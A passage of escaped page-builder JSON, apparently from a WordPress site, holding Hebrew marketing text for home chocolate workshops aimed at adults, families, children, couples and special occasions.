\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 